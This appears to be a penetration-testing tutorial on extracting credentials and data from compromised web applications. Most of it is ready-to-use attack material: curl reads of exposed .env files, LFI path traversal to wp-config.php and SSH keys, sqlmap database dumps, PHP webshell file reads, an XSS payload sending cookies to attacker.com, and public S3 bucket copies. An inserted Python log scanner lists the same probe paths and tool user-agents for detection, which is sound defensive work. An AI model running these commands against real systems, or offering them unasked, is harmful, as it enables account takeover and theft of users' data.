Exfiltrating Credentials and Sensitive Data from Web Applications
Getting inside the castle is one thing. Looting it without setting off alarms? That’s where real skill comes in. Once you’ve compromised a web application, the next step is clear: find and extract sensitive data—usernames, passwords, tokens, configuration files, database records, and anything else the devs forgot to lock up.
Objectives of Data Exfiltration
After gaining access to a web app, your goal is to:
- Extract user credentials and session tokens
- Steal secrets and configuration data (API keys, DB creds)
- Access or dump entire databases
- Identify lateral movement opportunities
Common Sources of Sensitive Data
1. Configuration Files
- .env files (Node, Laravel)
- wp-config.php (WordPress)
- .git/config if exposed
- config.php, settings.py, etc.

```bash
curl http://target.com/.env
# Look for DB credentials, API tokens
```
2. Backup Files and Misplaced Dumps
Typical names: db_backup.sql, backup.zip, config.bak
- Common naming patterns:

```
/backup.zip
/site-old/
/db.sql
/config.php.bak
```
3. LFI with Sensitive File Reads
If LFI is present:
```
http://target.com/index.php?page=../../../../wp-config.php
```
On Linux targets:
```
/etc/passwd
/var/www/html/.env
/root/.ssh/id_rsa
```
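For the defending side, here is an added example (not part of the original post) that runs a small detector over constructed web-server access-log lines and flags the probes listed above: requests for .env, wp-config.php, .git/config and backup or dump files, ../ traversal in a page parameter, and sqlmap, curl or wget user-agents. It assumes the combined log format; the sample lines and IP addresses are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Mar/2024:12:00:02 +0000] "GET /.env HTTP/1.1" 404 153 "-" "curl/8.4.0"
10.0.0.7 - - [10/Mar/2024:12:00:03 +0000] "GET /backup.zip HTTP/1.1" 200 8812 "-" "Wget/1.21"
10.0.0.9 - - [10/Mar/2024:12:00:04 +0000] "GET /index.php?page=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 301 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:12:00:05 +0000] "GET /products?id=1%20AND%201=1 HTTP/1.1" 200 2048 "-" "sqlmap/1.7"
10.0.0.5 - - [10/Mar/2024:12:00:06 +0000] "GET /images/logo.png HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Files the post lists as common sources of secrets, plus classic LFI targets.
SENSITIVE_PATHS = (".env", "wp-config.php", ".git/config", "config.php",
                   "settings.py", "id_rsa", "/etc/passwd")
BACKUP_EXT = (".bak", ".sql", ".zip", ".old")
TOOL_UA = ("sqlmap", "curl/", "wget/")

def classify(line):
    """Return (ip, decoded_url, status, reasons) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = unquote(m["url"])  # decode %2F, %2E etc. before matching
    path, _, query = url.partition("?")
    reasons = []
    if "../" in url or "..\\" in url:
        reasons.append("path traversal")
    if any(path.endswith(s) or s in query for s in SENSITIVE_PATHS):
        reasons.append("sensitive file request")
    if path.lower().endswith(BACKUP_EXT):
        reasons.append("backup/dump file request")
    if any(t in m["ua"].lower() for t in TOOL_UA):
        reasons.append(f"tooling user-agent ({m['ua']})")
    return (m["ip"], url, int(m["status"]), reasons) if reasons else None

def scan(log_text):
    """Run classify() over every line and keep only the hits."""
    return [hit for hit in (classify(l) for l in log_text.splitlines()) if hit]

if __name__ == "__main__":
    for ip, url, status, reasons in scan(SAMPLE_LOG):
        print(f"{ip} {status} {url} -> {', '.join(reasons)}")
```

A 404 on /.env is still worth an alert, since it shows someone is probing, while the 200 on /backup.zip shows what they actually retrieved.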
Tools & Techniques
sqlmap
```bash
sqlmap -u "http://target.com/product?id=1" --dump
# --dump: Extract entire DB
# --passwords: Grab password hashes
# --batch: Non-interactive mode
```
curl + grep
```bash
curl http://target.com/.env | grep DB_PASSWORD
```
wget for Large Files
```bash
wget http://target.com/backup.zip
unzip backup.zip
```
base64 + exfiltration
If outbound access is blocked:
```bash
cat db_dump.sql | base64
# Copy the encoded string, paste somewhere external, decode it offline
```
Exfil Through Webshells
If you uploaded a PHP webshell:
```php
<?php echo file_get_contents('/var/www/html/.env'); ?>
```
Or download a file directly:
```php
<?php readfile('backup.zip'); ?>
```
Access it through:
```
http://target.com/shell.php?cmd=cat%20/etc/passwd
```
From XSS to Token Theft
In stored or reflected XSS:
```html
<script>
fetch('http://attacker.com/steal.php?c=' + document.cookie)
</script>
```
This lets you capture session tokens or JWTs stored in cookies, provided the HttpOnly flag isn't set on them.
Cloud Misconfigurations
If S3 buckets or GCP buckets are misconfigured:
```bash
aws s3 ls s3://public-bucket-name --no-sign-request
aws s3 cp s3://public-bucket-name/secrets.txt . --no-sign-request
```
Real-World Flow
Target: http://dev-vulnerable.local
- Found SQLi on /products?id=
- sqlmap dumps credentials from users table
- Found /backup.zip via ffuf
- Unzipped and found .env file with DB_PASSWORD
- Found admin portal with basic auth, reused creds
- Accessed internal dashboard, found user exports
- Dumped all data for reporting
What to Look For in Your Report
When documenting a successful exfiltration, include:
- Exact data exfiltrated (usernames, hashes, secrets)
- Paths and methods used (e.g., .env file via LFI)
- Tools used (sqlmap, curl, wget)
- Screenshots (if permitted)
- Recommendations: remove public files, restrict access, rotate creds
Final Thoughts
Exfiltration isn’t just about downloading everything you can—it’s about doing it stealthily, selectively, and effectively. Learn where devs accidentally stash their secrets, and know the tools that can help you pull them out like a magician pulling rabbits from a hat.
